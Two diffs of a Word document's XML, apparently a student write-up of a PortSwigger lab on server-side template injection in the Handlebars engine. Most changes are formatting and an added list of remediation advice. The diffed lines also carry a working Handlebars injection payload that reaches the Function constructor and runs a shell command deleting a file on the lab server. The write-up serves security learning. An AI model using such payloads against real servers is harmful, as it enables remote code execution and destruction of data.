--- a/PortSwigger Labs/Advanced Topics/Server Side Template Injection/Lab 4 - Server-side template injection in an unknown language with a documented exploit.docx
+++ b/PortSwigger Labs/Advanced Topics/Server Side Template Injection/Lab 4 - Server-side template injection in an unknown language with a documented exploit.docx
@@ -178,7 +178,25 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">s we know the template engine deployed at the backend we will now craft a Payload 2 and then append it into the </w:t>
+        <w:t xml:space="preserve">s we know the template engine deployed at the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>backend</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we will now craft a Payload 2 and then append it into the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -250,13 +268,23 @@
         </w:rPr>
         <w:t xml:space="preserve"> by going through the documentation of </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Freemaker </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Freemaker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -329,8 +357,18 @@
           <w:numId w:val="5"/>
         </w:numPr>
       </w:pPr>
-      <w:r>
-        <w:t>wrtz{{#with "s" as |string|}}</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>wrtz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>{#with "s" as |string|}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -348,7 +386,15 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">    {{#with split as |conslist|}}</w:t>
+        <w:t xml:space="preserve">    {{#with split as |</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>conslist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>|}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -357,7 +403,15 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">      {{this.pop}}</w:t>
+        <w:t xml:space="preserve">      {{</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>this.pop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -366,7 +420,25 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">      {{this.push (lookup string.sub "constructor")}}</w:t>
+        <w:t xml:space="preserve">      {{</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>this.push</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (lookup </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>string.sub</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "constructor")}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -375,7 +447,15 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">      {{this.pop}}</w:t>
+        <w:t xml:space="preserve">      {{</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>this.pop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -384,7 +464,25 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">      {{#with string.split as |codelist|}}</w:t>
+        <w:t xml:space="preserve">      {{#with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>string.split</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> as |</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codelist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>|}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -393,7 +491,15 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">        {{this.pop}}</w:t>
+        <w:t xml:space="preserve">        {{</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>this.pop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -402,7 +508,33 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">        {{this.push "return require('child_process').exec('rm /home/carlos/morale.txt');"}}</w:t>
+        <w:t xml:space="preserve">        {{</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>this.push</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "return require('</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>child_process</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>').exec('rm /home/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>carlos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/morale.txt');"}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -411,7 +543,15 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">        {{this.pop}}</w:t>
+        <w:t xml:space="preserve">        {{</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>this.pop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -420,7 +560,15 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">        {{#each conslist}}</w:t>
+        <w:t xml:space="preserve">        {{#each </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>conslist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -430,7 +578,25 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">          {{#with (string.sub.apply 0 codelist)}}</w:t>
+        <w:t xml:space="preserve">          {{#with (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>string.sub.apply</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 0 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codelist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -528,6 +694,198 @@
           <w:szCs w:val="40"/>
         </w:rPr>
         <w:t>REMEDIATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Avoid Direct Template Execution:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The safest way to prevent server-side template injection is to never allow user-controlled data to dictate template content. Instead of using templates to generate dynamic content based on user input, use safer methods, such as setting content dynamically via the Document Object Model (DOM) on the client side.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Safe API Methods:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> If the template engine you're using offers both safe and unsafe methods, always opt for the safe one. Unsafe methods often provide more flexibility, but at the cost of security.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Input Validation:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Implement strict validation for all user-supplied data before processing. Regular expressions can be helpful in determining if input data matches expected patterns. Reject any input that doesn't strictly match expected patterns.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Output Encoding: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>When displaying user-controlled data, always encode the output to make it safe for the context in which it's being placed. This can prevent injected templates from being processed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Use a Content Security Policy (CSP):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A strong CSP can prevent many client-side injection attacks, including certain types of template injection.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Disable Unneeded Features:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Many template engines come with a wide range of features, not all of which may be needed for your application. By disabling unnecessary features, you can reduce the attack surface.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -543,6 +901,95 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="33C41AB6"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="EAE27376"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CF17964"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0D9ED8E4"/>
@@ -631,7 +1078,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4DF44F23"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4948A2BA"/>
@@ -720,7 +1167,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4E747E9B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C052C524"/>
@@ -809,7 +1256,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5A0D79F6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7798822A"/>
@@ -898,7 +1345,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="73E565C3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4BC4F6E2"/>
@@ -988,19 +1435,22 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1785732818">
-    <w:abstractNumId w:val="0"/>
+    <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="250045273">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="428746037">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="46537140">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="4" w16cid:durableId="46537140">
+  <w:num w:numId="5" w16cid:durableId="1438872559">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="5" w16cid:durableId="1438872559">
-    <w:abstractNumId w:val="2"/>
+  <w:num w:numId="6" w16cid:durableId="1567184340">
+    <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>
 </file>

--- a/PortSwigger Labs/Advanced Topics/Server Side Template Injection/Lab 4 - Server-side template injection in an unknown language with a documented exploit.docx
+++ b/PortSwigger Labs/Advanced Topics/Server Side Template Injection/Lab 4 - Server-side template injection in an unknown language with a documented exploit.docx
@@ -693,6 +693,105 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
+        <w:t>PROOF OF CONCEPT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="67FCA60B" wp14:editId="627AE5A9">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>408940</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6645910" cy="5133975"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="1983864778" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1983864778" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6645910" cy="5133975"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>REMEDIATION</w:t>
       </w:r>
     </w:p>
